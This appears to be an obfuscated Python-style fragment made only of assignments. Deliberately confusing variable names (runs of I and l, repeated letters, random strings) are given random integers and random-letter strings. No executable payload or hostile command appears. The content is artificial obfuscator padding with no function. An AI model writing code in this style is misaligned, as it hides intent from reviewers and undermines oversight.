IllIlIIlllllIIlIIIIIlIIIlIlIIIlllIIIIIIIlIIIIllIIIIlIllllllllIIlllllIlIlIlllIIIlIllIIIIIlllIIllllllllIIlIlllllIIllIIIIllIIlllIlIlIlIIIIIlIIlIllllIlIlIllIllIlIIIIllIlIIIIIllIlllIIlIIIIlIlIllllIlIIllIIIlIlIIIlIlIllIlIlIIlIlIlIlIllllIllIIllllIlIllllIIlIIllIIIlIlllIIlllllIIIlIlIlIIlllIIlIlllIlllllIIIlIIllllllIlllIlllIll = 856
aAAaaaAaAaAaaAAaAAaAAaAAAAAaaAaaAaaaaAaAAAAAaaaaAaaaAaaAaAAAaaAaAAAaAaAaaaAaaAAaAAaaaAaAAAAaAAAaAaAaaaaaaAaAAAaAAaAaAAAAaaaaaAAAAAAaaAAaAAAAAAAaAAAaaAaAAaAAAAAAaaAaaAAAAaAAAAaaAAAAAAAAAAAaAAAAAAaAAAaaAAAAaaAaAaaaaAaaaaAaAAAAAAAaaaaaAaaaaAAAAaAAaaaAAAaaAaAaaaaaaAaAaaAAAAAaaAaAaAAAAaAAaaaaAAaaAaAaaaAAAaaaaaAAaAaAAAAaAaA = 96
IlllIIIllllllIlIlIllIIIIllIllIlllIIlllIlIIIlIIllIIIlllllllIIlIllIlllIIIllllIIlIIIlIIIlIIIllIlIlIIlIIIlIIlIlllIlIIlIlIIIIIIlIIIlllIllllIIIlIlIlllIIIIIIllIIIIlIlIIIlllllllIlllIlIIlIIlIIllIlIIlllllIlIIllllIIllIIIIIIlIIIIlIlllllIlIIIlllIlllIIllIlIlIllllllllIIIlIlIlIlIIllllllIllIIlIllIlllIIlIlIIIllllllIlllIIIlIllllIIlllIlIll = "ARAzkfOnGePQrRFyyTiHvYdRcXsASzgMTSzewluwGPUtGqQoejigOoahRYmJolORDMJWAmWPgxevWhQ"
n16790034943474355323 = 411
Y325 = 206
YsNlCmeUNDlpVsVheJSJkLHSnDZytUDnSBhOzjHRXLLGgYZLCMXADCgamNRpDGNlTQnmPMeXzYpmRGB327 = "csklVfWnERDOrIlfjPXNoshKyaebHJsugAbggtzYxomDPrIgitNMCOywAtILZjoYfuKNaEarwiYooaF"
bbbbbbbbbbbbbbbbbbbbbbbbbbbbbbbbbbbbbbbbbbbbbbbbbbbbbbbbbbbbbbbbbbbbbbbbbbbbbbbbbbbbbbbbbbbbbbbbbbbbbbbbbbbbbbbbbbbbbbbbbbbbbbbbbbbbbbbbbbbbbbbbbbbbbbbbbbbbbbbbbbbbbbbbbbbbbbbbbbbbbbbbbbbbbbbbbbbbbbbbbbbbbbbbbbbbbbbbbbbbbbbbbbbbbbbbbbbbbbbbbbbbbbbbbbbbbbbbbbbbbbbbbbbbbbbbbbbbbbbbbbbbbbbbbbbbbbbbbbbbbbbbbbbbbbbbbbbbbbbbbbbbbbbbb = "maPqScIRUddZSZnbjMfPNVJAlUiASWcBniPyazBOzzxjebLZkijefknxrIwLoDjsCSNDHPsulJeuPSk"
X16790034943484292331 = 241
xWYhZnJlNPmvBNiuOkWvPvkmQtDBuZCMIQkuruhwfZuNvkjtnkRVdqtraKnLncMfRQBUgzYqWKKdefk333 = 562
UdicAIqmeeSnomZZJuZFNeyFcZBLDDfEtyoDBmuddaDFdLNJcRpVVbNqFqtIBcSfOeJgVdZpVwwrVrY335 = 341
KKKKKKKKKKKKKKKKKKKKKKKKKKKKKKKKKKKKKKKKKKKKKKKKKKKKKKKKKKKKKKKKKKKKKKKKKKKKKKKKKKKKKKKKKKKKKKKKKKKKKKKKKKKKKKKKKKKKKKKKKKKKKKKKKKKKKKKKKKKKKKKKKKKKKKKKKKKKKKKKKKKKKKKKKKKKKKKKKKKKKKKKKKKKKKKKKKKKKKKKKKKKKKKKKKKKKKKKKKKKKKKKKKKKKKKKKKKKKKKKKKKKKKKKKKKKKKKKKKKKKKKKKKKKKKKKKKKKKKKKKKKKKKKKKKKKKKKKKKKKKKKKKKKKKKKKKKKKKKKKKKKKKKKKKKKKKKKKK = "KuhHsPNNptrhKmKDTyUBYEwEAspOLOWORlSirhVCfXxBGATMCnIrdqlMfWPynxtrmVYARRHNYnFzhnu"